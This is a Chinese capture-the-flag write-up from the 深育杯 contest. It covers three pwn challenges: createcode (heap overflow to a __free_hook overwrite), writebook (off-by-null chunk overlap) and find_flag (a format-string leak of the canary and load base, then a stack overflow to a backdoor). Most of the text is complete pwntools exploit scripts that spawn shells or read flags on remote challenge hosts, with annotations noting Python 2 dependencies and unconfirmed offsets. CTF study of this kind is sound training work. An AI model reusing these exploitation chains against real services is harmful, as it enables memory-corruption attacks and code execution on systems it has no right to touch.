深育杯

政企组第22

createcode

堆溢出构造 overlap，修改 fd 指针，attack free_hook

# -*- coding: utf-8 -*-
from pwn import *
# Connection to the challenge service and the libc that ships with it; the
# host/port and the libc filename are the writeup's own values.
r=remote('192.168.41.10',2007)
libc=ELF('libc.so.6')

def add(con):
    """Select menu entry 1 and send *con* as the raw note body (no trailing newline)."""
    menu_prompt, content_prompt = '> ', 'content: '
    r.recvuntil(menu_prompt)
    r.sendline('1')
    r.recvuntil(content_prompt)
    r.send(con)
def show(idx):
    """Select menu entry 2 and answer the id prompt with *idx*."""
    for prompt, answer in (('> ', '2'), ('id: ', str(idx))):
        r.recvuntil(prompt)
        r.sendline(answer)
def delete(idx):
    """Select menu entry 3 and answer the id prompt with *idx*."""
    def answer(prompt, text):
        r.recvuntil(prompt)
        r.sendline(text)
    answer('> ', '3')
    answer('id: ', str(idx))

# NOTE(review): str and p64() bytes are concatenated below (0x328*'HRP'+p64(...)),
# so this is a Python 2 pwntools script; under Python 3 those lines raise TypeError.
# Stage 1: four entries, then re-take entry 0 with an oversized body.
add('HRP')
add('HRP')
add('HRP')
add('HRP')
delete(0)
# 0x328 repetitions of 'HRP' (0x978 bytes, not 0x328 bytes) followed by the 8-byte
# value 0x330*2+1 — the heading's heap overflow into the neighbouring header.
# TODO confirm the intended body length against the service's read size.
add(0x328*'HRP'+p64(0x330*2+1))
delete(0)
add('HRP')
show(0)
# Leak parsing: skip to the first 0x7f byte, then take the 6 bytes that end at the
# next one and widen them to a little-endian u64.
r.recvuntil('\x7f')
# libc.address is still 0 here, so libc.sym['__malloc_hook'] is the unrebased offset;
# the -96-0x10 correction is the writeup's own constant.
libc.address=u64(r.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-96-libc.sym['__malloc_hook']-0x10
add('/bin/sh\x00')
add('HRP')
# Stage 2: release every entry, then repeat the overflow; sym lookups are absolute now
# that libc.address is set (heading: fd pointer -> free_hook).
delete(3)
delete(2)
delete(1)
delete(0)
add(0x328*'HRP'+p64(0x330+1)+p64(libc.sym['__free_hook']-8))
add(0x328*'HRP'+p64(0x330+1)+'/bin/sh\x00')
add(8*'HRP'+p64(libc.sym['system']))
delete(1)
r.interactive()

writebook

edit 存在 off-by-null 漏洞，模板题，直接 overlap

# coding=utf-8
from pwn import *

# Local instance of the challenge binary; 'debug' echoes every byte sent/received.
r = process("./writebook")
context.arch = 'amd64'
context.log_level = 'debug'
libc = ELF('./libc.so.6')
# NOTE(review): `elf` is not referenced anywhere in the visible script.
elf = ELF('./writebook')


def choice(c):
    """Wait for the '>' menu prompt and reply with *c* (stringified) plus newline."""
    answer = str(c)
    r.recvuntil(">")
    r.sendline(answer)

def add1(size):
    """Menu 1, sub-option 1, then answer the ':' prompt with *size*."""
    for option in (1, 1):
        choice(option)
    r.recvuntil(":")
    r.sendline(str(size))

def add2(size):
    """Menu 1, sub-option 2, then answer the ':' prompt with *size*."""
    menu, sub = 1, 2
    choice(menu)
    choice(sub)
    size_prompt = ":"
    r.recvuntil(size_prompt)
    r.sendline(str(size))

def edit(index,content):
    """Menu 2: answer the index prompt with *index*, then the content prompt with *content*."""
    choice(2)
    for reply in (str(index), content):
        r.recvuntil(":")
        r.sendline(reply)

def show(index):
    """Menu 3: ask the program to print the entry at *index*."""
    idx = str(index)
    choice(3)
    r.recvuntil(":")
    r.sendline(idx)

def free(index):
    """Menu 4: release the entry at *index*."""
    def answer(prompt, text):
        r.recvuntil(prompt)
        r.sendline(text)
    choice(4)
    answer(":", str(index))

# NOTE(review): str + p64() bytes are concatenated below (edit(0,"a"*0x80+p64(...))),
# so this is a Python 2 pwntools script; Python 3 would raise TypeError there.
# Stage 1: allocate 9 entries of 0x98, free the first 8, re-take 7, then show(7);
# per the leak parsing below, entry 7's dump contains a libc pointer.
for i in range(9):
    add1(0x98)
for i in range(8):
    free(i)
for i in range(7):
    add1(0x98)
add1(50)
show(7)
# take the 6 bytes ending at the pointer's 0x7f byte and widen to a u64
leak = u64(r.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
# 0x3ebd30 is a fixed offset specific to this libc build — TODO confirm against ./libc.so.6
libc_base = leak-0x3ebd30
fh = libc_base + libc.sym['__free_hook']
system = libc_base + libc.sym['system']
success(hex(leak))
success(hex(libc_base))
# Stage 2: rebuild the layout the writeup uses for the overlap; trailing comments give
# the entry index the program hands out.
for i in range(9):
    free(i)
for i in range(7):
    add1(0xf0)
add1(0xf0)  # index 7
add1(0x88)  # index 8
add1(0xf0)  # index 9
add1(0x88)  # index 10
for i in range(7):
    free(i)
free(8)
free(7)
add1(0x88)  # index 0
# 0x80 bytes of filler then the 8-byte value 0x90+0x100 — the heading's off-by-null
# overlap setup (edit is the function with the off-by-null).
edit(0,"a"*0x80+p64(0x90+0x100))
free(9)
# NOTE(review): indentation was lost in the paste; edit(i, ...) uses the loop
# variable, so it is read as part of the loop body.
for i in range(7):
    add1(0xf0)
    edit(i,"/bin/sh\x00")
add1(0xf0)  # index 9
add1(0xf0)  # index 10

# Stage 3: entry 9's edit writes the __free_hook address; the next two allocations
# land so that entry 11 is edited with system, then freeing entry 10 ("/bin/sh") fires it.
free(0)
edit(9,p64(fh))
add1(0xf0)
add1(0xf0)
edit(11,p64(system))
edit(10,'/bin/sh\x00')
free(10)

r.interactive()

find_flag

格式化字符串泄露 canary 以及程序加载基地址，远程的基地址要 fuzz 一下

栈溢出跳转后门getflag

from pwn import *
context.log_level='debug'  # echo every byte exchanged with the target
def pwn():
    """Run one attempt against the module-global connection `r`.

    Reads two stack slots back via the format string "%17$p~%15$p" (the
    canary and a code pointer, per the heading), then sends the overflow
    buffer.  `r` must already be bound by the caller; any parse failure
    raises and is handled by the caller's retry loop.
    """
    #gdb.attach(r,'b *$rebase(0x13E2)')
    r.recv()
    # two "%N$p" reads separated by '~' so the replies can be split below
    pay="%17$p~%15$p"
    r.sendline(pay)
    r.recvuntil('Nice to meet you, ')
    canary=int(r.recv(18),16)   # "0x" + 16 hex digits
    r.recv(1)                    # the '~' separator
    # "0x" + 12 hex digits; +0xe8 is the writeup's offset to the backdoor — TODO confirm
    addr=int(r.recv(14),16)+0xe8
    print(hex(canary))
    print(hex(addr))
    r.recvuntil("Anything else? ")
    # layout per the writeup: 0x38 bytes of filler, the canary, 8 more bytes, then addr
    pay=b'a'*(0x40-8)+p64(canary)+b'a'*8+p64(addr)
    r.sendline(pay)
# Retry loop: the heading notes the remote load base has to be fuzzed, so each
# iteration reconnects, runs one attempt and checks the reply for 'flag'.
# NOTE(review): this assumes Python 2 (str/bytes interchangeable); under Python 3
# `a` is bytes and `'flag' in a` raises TypeError, which the bare except swallows,
# so the loop would never terminate.
while(1):
    try:
        #r=process('./fn')
        r=remote('192.168.41.125',2001)
        pwn()
        a=r.recv()
        print(a)
        if 'flag' in a:
            print(a)
            break
        r.close()
    except:
        # bare except also swallows KeyboardInterrupt; and if remote() itself failed
        # on the first iteration, `r` is unbound here and this line raises NameError
        r.close()